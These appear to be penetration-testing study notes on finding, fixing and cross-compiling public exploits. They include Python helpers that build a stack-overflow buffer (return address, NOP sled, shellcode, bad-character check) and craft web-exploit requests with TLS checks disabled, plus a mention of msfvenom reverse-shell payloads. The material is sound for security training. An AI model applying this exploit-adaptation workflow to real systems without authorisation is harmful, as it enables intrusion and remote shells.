Public exploits

Exploit Sources

Online exploit sources

Offline exploit resources

  • Searchsploit

  • Nmap NSE scripts

  • The Browser Exploitation Framework (BeEF)

  • Metasploit

Fixing exploits

Publicly available exploits rarely work as downloaded. Most need at least minor changes (target address, port, URL path), and some need more extensive rework, such as replacing the payload or adjusting a return address for the exact version of the target software.

Importing and examining exploits

  • Searchsploit includes a mirror function that copies an exploit into the current working directory: searchsploit -m 43321

  • Headers such as winsock2.h (or winsock.h) are a hint that a C program was written for Windows and must be cross-compiled on Linux rather than built with the native gcc

Items that commonly require modification

  • Target IP address and port

  • Attacking machine IP address and port

  • Return address for memory corruption exploits

  • Payload (typically generated with msfvenom)
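The checks behind the last two items, as an added example that is not part of the original notes: parse the C listing msfvenom emits with -f c back into bytes, confirm it contains none of the bad characters the exploit comments list, and rebuild the overflow buffer (padding, little-endian return address, NOP sled, shellcode, filler) while verifying the new payload still fits the space the original exploit had. The msfvenom listing below is a constructed stand-in, not working shellcode, and OFFSET, RET_ADDR, BUFFER_LEN and BAD_CHARS are hypothetical values of the kind you would copy from the exploit being fixed.

```python
import re
import struct

# Constructed sample standing in for `msfvenom -p windows/shell_reverse_tcp
# LHOST=... LPORT=... -f c` output. The bytes are illustrative, not working
# shellcode; the \x00 bytes near the start exist to trip the bad-char check.
MSFVENOM_C_OUTPUT = r'''
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff";
'''

# Hypothetical constraints of the kind an exploit's comments state: offset
# to the saved return address, address of a JMP ESP, total size of the
# buffer the vulnerable copy expects, and bytes the target mangles.
OFFSET = 780
RET_ADDR = 0x10090C83
BUFFER_LEN = 1000
BAD_CHARS = b"\x00\x0a\x0d"


def parse_msfvenom_c(text: str) -> bytes:
    """Turn msfvenom's `-f c` listing back into raw bytes."""
    hex_bytes = re.findall(r"\\x([0-9a-fA-F]{2})", text)
    return bytes(int(h, 16) for h in hex_bytes)


def find_bad_chars(payload: bytes, bad: bytes = BAD_CHARS) -> list:
    """Return (offset, byte) pairs for payload bytes the target would mangle."""
    return [(i, b) for i, b in enumerate(payload) if b in bad]


def build_buffer(payload: bytes, offset: int = OFFSET, ret: int = RET_ADDR,
                 total: int = BUFFER_LEN, nops: int = 16) -> bytes:
    """Assemble padding | return address | NOP sled | shellcode | filler.

    Raises ValueError when the payload carries bad characters or is larger
    than the room left after the sled, the two usual reasons a freshly
    swapped msfvenom payload fails where the original one worked.
    """
    bad = find_bad_chars(payload)
    if bad:
        raise ValueError(f"bad characters at offsets {[i for i, _ in bad]}; "
                         "regenerate with msfvenom -b")
    head = b"A" * offset + struct.pack("<I", ret) + b"\x90" * nops
    room = total - len(head)
    if len(payload) > room:
        raise ValueError(f"payload is {len(payload)} bytes, only {room} available")
    return head + payload + b"C" * (room - len(payload))


if __name__ == "__main__":
    shellcode = parse_msfvenom_c(MSFVENOM_C_OUTPUT)
    print(f"parsed {len(shellcode)} bytes, bad chars at "
          f"{[i for i, _ in find_bad_chars(shellcode)]}")
    try:
        build_buffer(shellcode)
    except ValueError as err:
        print("not usable as-is:", err)
```

Run the parse on the real msfvenom output for the target, then feed the result to build_buffer; if it raises, regenerate the payload with -b for the bad characters or a smaller encoder before touching the exploit again.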

Cross compiling exploit code

  • mingw-w64 is a popular cross compiler available on Linux

  • install mingw using sudo apt install mingw-w64

  • After installation, mingw-w64 can be used to compile Windows PE files; i686-w64-mingw32-gcc targets 32-bit Windows and x86_64-w64-mingw32-gcc targets 64-bit

    • i686-w64-mingw32-gcc 42341.c -o syncbreeze.exe

    • Source that uses Winsock must also link the socket library: append -lws2_32 to the command, otherwise the link fails with undefined references to WSAStartup, socket, connect and friends

Fixing web exploits

There are several additional considerations when modifying web exploits:

  • Does the exploit initiate an HTTP or HTTPS connection?

  • Does the exploit access a web application through a specific path or route?

  • Does the exploit leverage a pre-authentication vulnerability, or are credentials required?

  • How are the GET and POST requests crafted to trigger and exploit the vulnerability?

  • Does the exploit rely on default application settings that might have been changed at install?

  • Will oddities such as self-signed certificates disrupt the exploit?
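The checklist above turned into code, as an added example that is not part of the original notes: a small request builder (standard library only) that takes scheme, host and port, the path the application was actually installed under, the vulnerable route, optional credentials and POST data, and an unverified TLS context for self-signed certificates. The function and parameter names are this example's own, and the host, port, path and credentials used in the usage block are constructed values.

```python
import base64
import ssl
import urllib.parse
import urllib.request


def make_url(host: str, port: int, base_path: str, route: str, https: bool) -> str:
    """Join scheme, host:port, the install's base path and the exploit's route.

    base_path is where the application really lives ('/' or '/app'), route is
    the path the exploit needs relative to that. The port is omitted when it
    is the scheme's default so logs and redirects compare cleanly.
    """
    scheme = "https" if https else "http"
    default_port = 443 if https else 80
    netloc = host if port == default_port else f"{host}:{port}"
    parts = [p.strip("/") for p in (base_path, route) if p.strip("/")]
    return f"{scheme}://{netloc}/" + "/".join(parts)


def basic_auth_header(username: str, password: str) -> dict:
    """HTTP Basic credentials for exploits that need an authenticated session."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return {"Authorization": "Basic " + token}


def tls_context(verify: bool) -> ssl.SSLContext:
    """Default verification, or an unverified context for self-signed certs."""
    ctx = ssl.create_default_context()
    if not verify:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    return ctx


def build_request(host, port, base_path, route, https=False, creds=None,
                  params=None, data=None, extra_headers=None):
    """Assemble the request an adapted exploit would send; nothing is sent here.

    `params` becomes the query string of a GET, `data` becomes a form-encoded
    POST body, so the same builder covers both trigger styles.
    """
    url = make_url(host, port, base_path, route, https)
    if params:
        url += "?" + urllib.parse.urlencode(params)
    headers = {"User-Agent": "Mozilla/5.0"}
    if creds:
        headers.update(basic_auth_header(*creds))
    if extra_headers:
        headers.update(extra_headers)
    body = urllib.parse.urlencode(data).encode() if data else None
    if body is not None:
        headers["Content-Type"] = "application/x-www-form-urlencoded"
    method = "POST" if body is not None else "GET"
    return urllib.request.Request(url, data=body, headers=headers, method=method)


def send(req, verify_tls=True, timeout=10):
    """Send the request; disable certificate checks only for https targets."""
    ctx = tls_context(verify_tls) if req.type == "https" else None
    with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
        return resp.status, resp.read()


if __name__ == "__main__":
    # Constructed target values; nothing here refers to a real host.
    req = build_request("10.10.10.5", 8443, "/app", "login.php", https=True,
                        creds=("admin", "password"),
                        data={"user": "a", "pass": "b"})
    print(req.get_method(), req.full_url)
    # status, body = send(req, verify_tls=False)   # self-signed cert on target
```

When the exploit stops working after a port or path change, print req.full_url and req.get_method() before sending; a wrong base path, a GET where the application expects a POST, or a default port dropped by a proxy accounts for most "dead" web exploits.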
